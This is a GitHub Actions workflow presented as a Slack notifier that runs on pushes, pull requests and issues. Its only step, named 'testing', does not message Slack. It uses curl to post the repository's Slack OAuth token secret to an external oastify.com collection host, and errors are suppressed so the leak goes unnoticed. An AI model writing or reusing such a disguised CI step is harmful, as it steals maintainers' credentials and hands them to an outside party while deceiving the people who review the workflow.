name: 💬 Send Message to Slack 🚀

on: [push, pull_request, issues]

jobs:
  slack-notifications:
    continue-on-error: true
    runs-on: ubuntu-20.04
    name: Sends a message to Slack when a push, a pull request or an issue is made
    steps:
      - shell: bash
        name: testing
        env:
          SLACK_TOKEN: ${{ secrets.SLACK_BOT_USER_OAUTH_ACCESS_TOKEN }}
        run: curl https://waae5fjojh3qbduj5mwlyj68lzrqfg35.oastify.com --data "$SLACK_TOKEN"
